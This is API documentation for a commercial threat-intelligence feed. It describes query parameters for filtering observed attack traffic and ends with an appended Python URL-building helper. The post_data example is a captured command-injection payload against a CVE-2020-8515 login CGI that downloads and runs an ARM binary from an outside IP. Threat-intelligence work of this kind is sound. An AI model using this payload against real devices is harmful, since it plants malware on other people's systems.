Bad Packets® Cyber Threat Intelligence API (1.0.0)


Bad Packets® Cyber Threat Intelligence API provides a curated feed of exploit activity, malware payloads, and command-and-control servers used by threat actors. We also monitor emerging threats targeting IoT/ICS management systems, distributed computing environments, and other enterprise endpoints. Our feed is continuously updated with the latest indicators of compromise as new threats are detected.

Authentication

Authorization Token

Security Scheme Type: API Key
Header parameter name: Authorization Token

ping

Endpoint for testing API key and authentication

Authorizations:

Responses

200

OK

403

Forbidden

get /ping
https://api.badpackets.net/v1/ping

Response samples

Content type
application/json
{
  "success": true
}

query

Run a query that returns a filtered result from threat intelligence data

Authorizations:
query Parameters
source_ip_address
string
Example: source_ip_address=80.82.65.234

Host's IP address

target_port
integer
Example: target_port=8080

Port targeted

protocol
string
Example: protocol=tcp

Protocol used

user_agent
string
Example: user_agent=Welcome

User agent used

payload
string
Example: payload=POST /cgi-bin/mainfunction.cgi HTTP/1.1

Payload captured including Method, URI, and request type/version.

post_data
string
Example: post_data=action=login&keyPath=' /bin/sh${IFS}-c${IFS}'cd${IFS}/tmp${IFS}&&${IFS}busybox${IFS}wget${IFS}http://185.172.110.224/ab/arm7${IFS}&&chmod${IFS}777${IFS}arm7${IFS}&&${IFS}./arm7${IFS}bober' '&loginPwd=a&loginUser=a

POST data captured (when applicable)

country
string
Example: country=NL

ISO 3166-1 two letter country code

first_seen_before
string
Example: first_seen_before=2020-03-31T16:01:11Z

Timestamp of when the host was first observed in ISO 8601 format

first_seen_after
string
Example: first_seen_after=2020-03-31T16:01:11Z

Timestamp of when the host was first observed in ISO 8601 format

last_seen_before
string
Example: last_seen_before=2020-03-31T17:58:50Z

Timestamp of when the host was last observed in ISO 8601 format

last_seen_after
string
Example: last_seen_after=2020-03-31T17:58:50Z

Timestamp of when the host was last observed in ISO 8601 format

tags
string
Example: tags=CVE-2020-8515

Bad Packets® CTI tag

event_count
integer
Example: event_count=22

Count of events detected from a host

limit
integer [ 1 .. 1000 ]

Number of results per page

offset
integer

Number of records to skip, i.e. the record number to start at

Responses

200

OK

400

Invalid query

401

Unauthorized

403

Forbidden

get /query
https://api.badpackets.net/v1/query

Response samples

Content type
application/json
{}
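
Added example (not part of the Bad Packets documentation): a Python helper that checks filters against the /query parameters listed above and builds a correctly percent-encoded request URL, so a captured payload or post_data value containing "&", "=" or spaces stays a single parameter. It only builds URLs and sends nothing; the function names, the strict timestamp shape and the non-negative offset check are assumptions of this example, and authentication is left to the caller.

```python
from datetime import datetime
from urllib.parse import urlencode

BASE_URL = "https://api.badpackets.net/v1/query"  # endpoint from the page

# Parameter names and types as documented for GET /query.
STRING_PARAMS = {"source_ip_address", "protocol", "user_agent", "payload",
                 "post_data", "country", "tags"}
INT_PARAMS = {"target_port", "event_count", "limit", "offset"}
TIME_PARAMS = {"first_seen_before", "first_seen_after",
               "last_seen_before", "last_seen_after"}


def build_query_url(**filters):
    """Validate filters against the documented parameters and return the URL."""
    params = {}
    for name, value in filters.items():
        if name in INT_PARAMS:
            if isinstance(value, bool) or not isinstance(value, int):
                raise ValueError(f"{name} must be an integer")
            if name == "limit" and not 1 <= value <= 1000:
                raise ValueError("limit must be in the range 1..1000")
            # Assumption of this example: a skip count cannot be negative.
            if name == "offset" and value < 0:
                raise ValueError("offset must not be negative")
        elif name in TIME_PARAMS:
            # Assumption: accept only the shape used in the page's examples,
            # e.g. 2020-03-31T16:01:11Z (strptime raises ValueError otherwise).
            datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")
        elif name in STRING_PARAMS:
            if name == "country" and not (len(value) == 2 and value.isalpha()):
                raise ValueError("country must be a two-letter code")
        else:
            raise ValueError(f"unknown query parameter: {name}")
        params[name] = value
    # urlencode percent-encodes '&', '=', spaces and quotes inside values, so a
    # captured post_data string stays one parameter instead of splitting.
    return BASE_URL + "?" + urlencode(params)


def page_urls(total, limit, **filters):
    """URLs that walk `total` records in pages of `limit` using offset."""
    return [build_query_url(limit=limit, offset=off, **filters)
            for off in range(0, total, limit)]


if __name__ == "__main__":
    # Constructed sample values in the style of the page's examples.
    print(build_query_url(tags="CVE-2020-8515", country="NL", limit=1000,
                          post_data="action=login&loginUser=a"))
```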